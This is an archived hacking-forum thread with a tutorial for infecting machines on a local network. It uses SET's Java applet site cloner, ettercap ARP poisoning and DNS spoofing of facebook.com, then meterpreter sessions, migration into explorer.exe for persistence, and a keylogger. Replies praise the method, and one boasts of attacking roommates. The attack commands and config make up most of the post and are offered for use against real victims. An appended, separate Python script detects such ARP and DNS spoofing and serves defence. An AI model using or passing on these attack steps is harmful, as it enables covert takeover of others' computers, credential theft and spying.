Tutorial: Infection on LAN without sending files - Printable Version
Sinisterly (https://sinister.ly), Forum: Network Hacking, Thread: /Thread-Tutorial-Infection-on-LAN-without-sending-files--20181
Infection on LAN without sending files - Crypt - 11-16-2013

My favorite program by far is SET (which stands for Social Engineering Toolkit). It's super easy to use, and gives magnificent results. There are multiple methods of using SET. The one I will explain to you is my favorite. Basically it will copy a website and make it so that when anyone on your network visits this website, they will go to your website instead with the virus on it! If you use this method, it's best to use sites like Facebook or other ones that people frequently use.

OK, on with the tutorial. In this method, we will be using:
- Terminal in Backtrack 5 (preferably R3)
- The Social Engineering Toolkit (SET)

First start SET by going to the top right of the Backtrack window onto the "Applications" button, from there click "Exploitation Tools", then "Social Engineering" and then click "set". If there are two, click the top one.

Then we will type in 2 (Website Attack Vectors). Please note that, like I said, SET is probably the easiest-to-use tool on Backtrack. From this menu, you can experiment. I will explain some of the options here.

- Java Applet Attack - Clones a site; then when someone visits the site, it prompts them to run a Java file. Then it will infect the victim's computer and you will be able to control it.
- Metasploit Browser Exploit - This will use Metasploit (my second favourite tool on Backtrack) to create a server. When the victim's computer connects to the server (by typing in your IP), they will be infected and you will be able to take control of their computer. This one is only OK because you have to somehow convince the victim to type your IP in the address bar. Ex. 192.168.1.124:8080
- Credential Harvester Attack - This is probably the best one to use if you just want to get their Facebook/Gmail/whatever passwords. Basically it'll clone a site's login page. When people visit it (by typing in your IP address) they will see the login page and probably try to log in. Backtrack will copy what they typed in (their username and password) and send it back to you.

I will not explain the other ones as they are more complicated and not suited for a tut that was made for newbs.

Then we will wait for it to load. Once it loads it will bring up a menu with a bunch of options. We will type in "1" without the brackets. Then we will type in "1" (The Java Applet Attack Method). It will then display some options. We will use number 2 (Site Cloner).

Type in the required information that it prompts you to enter. When it asks which site you would like to clone, type in a site that you think your victims use a lot. Ex. http://www.facebook.com

When it asks you to enter your IP for the reverse connection, open up a terminal (on the main page of Backtrack at the top, it has a little picture of a black window) and type in:

Code:
ifconfig

When it asks if you use NAT/port forwarding, enter no or n.
When it asks what port to run it on, type in a random port. I use port 4444.
When it asks what payload to generate, use number 14 because it is AV safe (anti-virus undetectable).
When it asks what type of meterpreter session to use (there will be 3 options), type in number 1.

When all that is done, press enter and it will start doing its thing. Meanwhile, we will open up a terminal and type in:

Code:
gedit /usr/local/share/ettercap/etter.dns

Scroll down to the part near the top where it says "Microsoft Sucks". You will see a part of it that says something like this:

Code:
microsoft.com      A   198.182.196.56
*.microsoft.com    A   198.182.196.56
www.microsoft.com  PTR 198.182.196.56

We need to change the microsoft.com entries to the website that the victim will be visiting (Ex. Facebook), and we need to change the IP addresses to the IP address that we got when we entered ifconfig. Here is an example:

Code:
facebook.com      A   192.168.1.124
*.facebook.com    A   192.168.1.124
www.facebook.com  PTR 192.168.1.124

This step is ESSENTIAL for any of this to work!

We will save the file by clicking the button at the top that says Save, then we will close the window. We will then open up a new terminal and enter in:

Code:
ettercap -Tqi eth0 -P dns_spoof -M ARP // //

Try this ONLY if the one above didn't work:

Code:
ettercap -Tqi wlan0 -P dns_spoof -M ARP // //

Go back to our SET terminal and see if it is done. It is done when it starts making a list of gibberish and says "starting the payload handler". Minimize all of this, then go to http://www.facebook.com on your normal computer (or whatever site you used). (We are doing this to test if it works; this will work on any computer in your network.) You should be prompted to run a Java plugin. Run it this time and click Run on the popup window. Then return to the SET terminal. It should have started spouting a bunch of crap. Wait until it says "finished migrating" or something along those lines. This means that you have successfully infected the victim's computer.

To interact with the victim's computer, first type in:

Code:
sessions -l

Type in:

Code:
sessions -i 1

BOOM! We now have control over the victim's computer. Google meterpreter commands to see what you can do once at this stage.

To ensure that the victim stays infected, we are going to migrate our server to the explorer.exe task on the victim's computer. This way, they can only get us out if they restart their computer or something. To do this, first type in:

Code:
ps

Go back down and type in:

Code:
migrate numberthatyouremembered

Wait until it says "migration completed successfully". You may now use commands for the meterpreter. 4 useful commands are:

Code:
keyscan_start (starts a keylogger)

THIS IS JUST THE TIP OF THE ICEBERG! IF YOU ENJOYED THIS TUT OR FOUND IT USEFUL, PLEASE COMMENT. ALSO DON'T HESITATE TO LET ME KNOW IF SOMETHING ISN'T WORKING FOR YOU OR ONE OF MY CODES HAS A TYPO OR SOMETHING.

THIS WAS NOT COPIED AND PASTED FROM ANOTHER USER. IT SEEMS THAT MY TUTORIAL ORIGINALITY IS OFTEN QUESTIONED. IF YOU COPY THIS, GIVE ME CREDIT AT LEAST!

Posting in this thread to keep it alive is as easy as clicking this link. Please do so. Thanks

RE: Infection on LAN without sending files - Adorapuff - 11-17-2013

This is a great tutorial, but I recommend changing the topic to DNS Spoofing Tutorial. Very long and informative. Great job. This can be done on Android with Network Spoofer. It uses ARP poisoning.

RE: Infection on LAN without sending files - Crypt - 11-17-2013

(11-17-2013, 04:37 PM) Putin Wrote:
> This is a great tutorial, but I recommend changing the topic to DNS Spoofing Tutorial. Very long and informative. Great job. This can be done on Android with Network Spoofer. It uses ARP poisoning.

Thank you

RE: Infection on LAN without sending files - maxjms4 - 11-29-2013

Thanks for the tut, love it, keep up.

RE: Infection on LAN without sending files - Silky - 02-06-2014

Nice tut, but I like my little (big) Python HTTP redirect script that sets up a transparent proxy combined with BeEF. My roommates don't stand a chance! Kind of like what Adorapuff mentioned, which you can do in dSploit, but I despise Java, which is what their transparent proxy is in, and wanted to make the process quicker on my laptop.
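Added example, not from any post in this thread: a defender-side check in Python for the two traces that the ARP poisoning and dns_spoof technique described above leave on a LAN. One MAC suddenly claiming the gateway and other hosts' addresses, and a public hostname (the thread's facebook.com) answered with a private address such as 192.168.1.124. The ARP observations and DNS answers below are constructed sample data; in practice they would come from a passive capture or the hosts' ARP caches.

```python
import ipaddress
from collections import defaultdict

# Constructed ARP observations as (ip, mac) pairs, as a passive monitor on the
# LAN would see them. 192.168.1.124 is the address the tutorial's etter.dns
# points victims at; the same MAC later claims the gateway and a client's IP.
ARP_OBSERVATIONS = [
    ("192.168.1.1",   "aa:bb:cc:00:00:01"),   # real gateway
    ("192.168.1.124", "de:ad:be:ef:00:24"),   # the poisoning host's own IP
    ("192.168.1.50",  "aa:bb:cc:00:00:50"),   # an ordinary client
    ("192.168.1.1",   "de:ad:be:ef:00:24"),   # gateway "moves" to the other MAC
    ("192.168.1.50",  "de:ad:be:ef:00:24"),   # client's IP claimed as well
]

# Constructed DNS A-record answers (qname, rdata) seen on the wire.
DNS_ANSWERS = [
    ("www.facebook.com", "192.168.1.124"),  # public name answered with a LAN IP
    ("www.example.org",  "93.184.216.34"),  # normal public answer
    ("printer.lan",      "192.168.1.20"),   # legitimate internal name
]

def arp_anomalies(observations):
    """Flag IPs whose MAC changed and MACs that claim more than one IP."""
    ip_to_macs = defaultdict(list)
    mac_to_ips = defaultdict(set)
    for ip, mac in observations:
        if mac not in ip_to_macs[ip]:
            ip_to_macs[ip].append(mac)
        mac_to_ips[mac].add(ip)
    findings = []
    for ip, macs in ip_to_macs.items():
        if len(macs) > 1:
            findings.append(f"ARP: {ip} changed MAC {macs[0]} -> {macs[-1]}")
    for mac, ips in mac_to_ips.items():
        if len(ips) > 1:
            findings.append(f"ARP: {mac} claims {len(ips)} IPs: {sorted(ips)}")
    return findings

def dns_anomalies(answers, internal_suffixes=(".lan", ".local")):
    """Flag names outside the internal zones that resolve to RFC 1918 space."""
    findings = []
    for name, rdata in answers:
        addr = ipaddress.ip_address(rdata)
        if addr.is_private and not name.endswith(internal_suffixes):
            findings.append(f"DNS: {name} -> {rdata} (public name, private address)")
    return findings

if __name__ == "__main__":
    for line in arp_anomalies(ARP_OBSERVATIONS) + dns_anomalies(DNS_ANSWERS):
        print(line)
```

A static ARP entry for the gateway on managed hosts, or DHCP snooping with dynamic ARP inspection on the switch, removes the poisoning step this check only detects.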